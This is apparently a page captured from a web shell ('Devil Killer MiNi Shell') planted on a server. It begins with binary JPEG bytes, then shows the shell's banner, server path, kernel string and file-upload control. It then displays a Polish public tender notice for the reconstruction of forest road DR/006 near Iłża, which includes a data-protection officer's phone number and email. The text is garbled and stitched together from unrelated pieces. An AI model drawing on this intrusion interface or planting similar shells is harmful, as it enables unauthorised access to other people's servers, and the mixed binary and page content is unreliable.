JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240125/0006625301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi leśnej nr DR/006 na terenie obrębu leśnego Marcule w Leśnictwach Seredzice i Polany – ETAP III w km 5+000-7+000” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">NADLEŚNICTWO MARCULE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 670080721</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Marcule 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Iłża</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">27-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">marcule@radom.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.radom.lasy.gov.pl/marcule</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Leśnictwo i Gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi leśnej nr DR/006 na terenie obrębu leśnego Marcule w Leśnictwach Seredzice i Polany – ETAP III w km 5+000-7+000” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-93697efc-bb56-11ee-9897-f6855eb846c0</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00066253</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-01-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> platformazakupowa.pl/pn/lasy_marcule <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">platformazakupowa.pl/pn/lasy_marcule</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">13.9. Zamawiający określa następujące<br/>wymagania sprzętowo – aplikacyjne pozwalające na korzystanie z Platformy:<br/>a) stały dostęp do sieci Internet;<br/>b) posiadanie dowolnej i aktywnej skrzynki poczty elektronicznej (e-mail),<br/>c) komputer z zainstalowanym systemem operacyjnym Windows 7 (lub nowszym) albo Linux,<br/>d) zainstalowana dowolna przeglądarka internetowa - Platforma współpracuje z najnowszymi, stabilnymi wersjami wszystkich<br/>głównych przeglądarek internetowych (Internet Explorer 10+, Microsoft Edge, Mozilla Firefox, Google Chrome, Opera),<br/>e) włączona obsługa JavaScript oraz Cookies.<br/>13.10. Zamawiający dopuszcza następujący format przesyłanych danych: pliki o wielkości do 20 MB w formatach: .pdf, .doc, .docx.,<br/>.xlsx.jpg.<br/>13.11. Ofertę należy sporządzić w języku polskim. Ofertę składa się, pod rygorem nieważności, w formie elektronicznej (tj. w postaci<br/>elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym w formatach danych określonych w rozporządzeniu Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie<br/>Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej<br/>oraz minimalnych wymagań dla systemów teleinformatycznych (tekst jedn.: Dz. U. z 2017 r. poz. 2247 z późn. zm.). Zamawiający<br/>rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf. W celu ewentualnej kompresji<br/>danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip; .7Z. Wśród formatów powszechnych a NIE<br/>występujących w rozporządzeniu występują: .rar; .gif .bmp; .numbrs; .pages. Dokumenty złożone w takich plikach zostaną uznane<br/>za złożone nieskutecznie. Instrukcje korzystania z Platformy dotyczące w szczególności logowania, składania wniosków o<br/>wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy<br/>znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-<br/>instrukcje</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">platformazakupowa.pl/pn/lasy_marcule</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający oświadcza, że spełnia wymogi określone w<br/>rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie<br/>danych) (Dz.Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez<br/>Wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi.Zamawiający<br/>informuje, że:1) administratorem danych osobowych Wykonawcy jest Nadleśnictwo Marcule.2) w<br/>sprawach związanych z przetwarzaniem danych osobowych, można kontaktować się z Inspektorem<br/>Ochrony Danych, którym jest „DPO” Anna Głowacka za pośrednictwem telefonu 690616117 lub adresu<br/>e-mail: anna.glowacka1980@gmail.com;3) dane osobowe Wykonawcy będą przetwarzane w celu<br/>przeprowadzenia postępowania o udzielenie zamówienia publicznego pn. „Budowa drogi leśnej nr<br/>DR/006 na terenie obrębu leśnego Marcule w Leśnictwach Seredzice i Polany – ETAP II w km 2+600-5+000” – znak sprawy:<br/>SA.270.50.2022 oraz w celu archiwizacji dokumentacji dotyczącej tego<br/>postępowania;4) odbiorcami przekazanych przez Wykonawcę danych osobowych będą osoby lub<br/>podmioty, którym zostanie udostępniona dokumentacja postępowania w oparciu o art. 18 oraz art. 74<br/>ust. 1 ustawy Pzp;5) dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ustawy Pzp,przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia, a jeżeli okres<br/>obowiązywania umowy w sprawie zamówienia publicznego przekracza 4 lata, okres przechowywania<br/>obejmuje cały okres obowiązywania umowy</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje, że;1) udostępnia dane osobowe, o<br/>których mowa w art. 10 RODO (dane osobowe dotyczące wyroków skazujących i czynów<br/>zabronionych) w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale<br/>IX ustawy Pzp, do upływu terminu na ich wniesienie;2) udostępnianie protokołu i załączników do<br/>protokołu ma zastosowanie do wszystkich danych osobowych, z wyjątkiem tych, o których mowa w art.<br/>9 ust. 1 RODO (tj. danych osobowych ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne, przekonania religijne lubświatopoglądowe, przynależność do związków zawodowych oraz<br/>przetwarzania danych genetycznych, danych biometrycznych w celu jednoznacznego zidentyfikowania<br/>osoby fizycznej lub danych dotyczących zdrowia, seksualności lub orientacji seksualnej tej osoby),<br/>zebranych w toku postępowania o udzielenie zamówienia;3) w przypadku korzystania przez osobę,<br/>której dane osobowe są przetwarzane przez Zamawiającego, z uprawnienia, o którym mowa w art. 15<br/>ust. 1–3 RODO (związanych z prawem Wykonawcy do uzyskania od administratora potwierdzenia, czy<br/>przetwarzane są dane osobowe jego dotyczące, prawem Wykonawcy do bycia poinformowanym o<br/>odpowiednich zabezpieczeniach, o których mowa w art. 46 RODO, związanych z przekazaniem jego<br/>danych osobowych do państwa trzeciego lub organizacji międzynarodowej oraz prawem otrzymania<br/>przez Wykonawcę od administratora kopii danych osobowych podlegających przetwarzaniu),<br/>Zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji,<br/>mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia;4) skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia, o<br/>którym mowa w art. 16 RODO (uprawnienie do sprostowania lub uzupełnienia danych osobowych), nie<br/>może naruszać integralności protokołu postępowania oraz jego załączników;5) w postępowaniu o<br/>udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1<br/>RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania;6) w<br/>przypadku, gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO<br/>spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub<br/>załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia<br/>Zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust.<br/>2 rozporządzenia 2016/679</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.4.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Projektowana szerokość drogi 3,5m. Poszerzenie na mijankach do 6,5m, zmiana szerokości drogi realizowana na skosie w<br/>stosunku 1:7 przy zaokrągleniu załamań promieniem R=50m. - Rozmieszczenie mijanek przedstawione zostało w Projekcie<br/>Zagospodarowania Terenu w części opisowej i na rysunku PZT. Na początkowym odcinku drogi ( na włączeniu do drogi<br/>powiatowej- szerokość drogi 5,0m. Na zakończeniu drogi, na włączeniu do drogi gminnej szerokość jezdni wynosi 4,0m.<br/>Droga z obustronnymi poboczami o szerokości 0,75m, ziemną opaską szerokości 25cm i trapezowymi rowami o szerokości<br/>podstawy równej 40cm i skarpami nachylonymi w stosunku 1:1,5.<br/>Zadanie (przebudowa drogi) jest realizowane w 4 etapach – etap ten (Etap III) ma zostać z realizowany w całości w wyznaczonym terminie w cyklu dwuletnim do 2025 r. ze względu na posiadane środki finansowe w danym roku gospodarczym.<br/>Zamawiający posiada w tym roku budżetowym na tą inwestycję kwotę netto 850 000 zł.<br/>Inwestycja ze względu na nie zakończony etap drugi, może zostać rozpoczęta od kilometraża 7+000-5+000. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45100000-8 - Przygotowanie terenu pod budowę</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">20 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki,<br/>dotyczące sytuacji ekonomicznej lub finansowej. Ocena spełniania warunków udziału w<br/>postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.Warunek ten zostanie uznany<br/>za spełniony, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie mniejszą<br/>niż 1.000.000 zł (jeden milion złotych).O udzielenie zamówienia publicznego mogą ubiegać się<br/>wykonawcy, którzy spełniają warunki, dotyczące zdolności technicznej lub zawodowej. Ocena<br/>spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.<br/>a) Warunek w zakresie doświadczenia zostanie uznany za spełniony, jeżeli Wykonawca wykaże,<br/>że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, zrealizował co najmniej 2 (dwie) roboty budowlane o<br/>podobnym charakterze i zakresie jakie obejmuje niniejsze zamówienie, tj. budowa, przebudowa<br/>lub rozbudowa drogi o wartości 800.000 zł (osiemset tysięcy złotych) co najmniej każda,<br/>wykonane (zakończone) w ramach dwóch umów, z podaniem ich wartości, daty i miejsca<br/>wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie<br/>z zasadami sztuki budowlanej i prawidłowo ukończone. b) Warunek w zakresie osób<br/>skierowanych przez Wykonawcę do realizacji zamówienia, zostanie uznany za spełniony, jeśli<br/>Wykonawca wykaże, że dysponuje co najmniej jedną osobą, która będzie uczestniczyć w<br/>wykonywaniu zamówienia, posiadającą uprawnienia budowlane w zakresie kierowania robotami<br/>w specjalności drogowej.O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy,<br/>którzy spełniają warunki, dotyczące posiadania zdolności do występowania w obrocie<br/>gospodarczym. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na<br/>zasadzie spełnia/nie spełnia.O udzielenie zamówienia publicznego mogą ubiegać się<br/>wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis<br/>lub informacja z<br/>Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzone nie<br/>wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do<br/>rejestru lub ewidencji.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami<br/>Rzeczypospolitej Polskiej, zamiast Informacji z Krajowego Rejestru Karnego składa informację z<br/>odpowiedniego rejestru, takiego jak rejestr sądowy, albo, w przypadku braku takiego rejestru inny równoważny dokument wydany<br/>przez właściwy organ sądowy lub administracyjny kraju, w<br/>którym wykonawca ma siedzibę lub miejsce zamieszkania, w zakresie art. 108 ust. 1 pkt 1 i 2<br/>ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przed jego złożeniem</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz podmiotowych<br/>środków dowodowych na potwierdzenie niepodlegania wykluczeniu:<br/>Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta<br/>została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni,<br/>aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych: Wykaz osób,<br/>Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej/ Polisa OC, Wykaz robót<br/>budowanych</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Oferta na roboty budowlane;Wykaz części zamówienia, której wykonanie wykonawca zamierza<br/>powierzyć podwykonawcom;Oświadczenie o zatrudnianiu osób na podstawie umowy o<br/>pracę;Zobowiązanie podmiotu udostępniającego zasoby.Jeżeli jest to niezbędne do zapewnienia<br/>odpowiedniego przebiegu postępowania o udzielenie zamówienia, Zamawiający może na<br/>każdym etapie postępowania, wezwać Wykonawców do złożenia wszystkich lub niektórych<br/>podmiotowych środków dowodowych, aktualnych na dzień ich złożenia. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 20 000 PLN.<br/>15.4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: 09 1020 2629 0000<br/>9102 0302 4791 (w tytule przelewu zaleca się wpisać nazwę i sygnaturę postępowania). Wadium musi wpłynąć na<br/>wskazany rachunek bankowy najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek<br/>bankowy Zamawiającego). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wyboru oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>Wykonawcy ci, na wezwanie Zamawiającego, zobowiązani będą przed zawarciem umowy w<br/>sprawie zamówienia publicznego przedłożyć kopię umowy regulującej współpracę tych<br/>Wykonawców. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców,<br/>dokument ”Oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału”, o<br/>którym mowa w pkt. 9.1 SWZ, składa każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków<br/>udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu. Wykonawcy mogą wspólnie ubiegać się o udzielenie<br/>zamówienia. W takim przypadku Wykonawcy zobowiązani są do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, 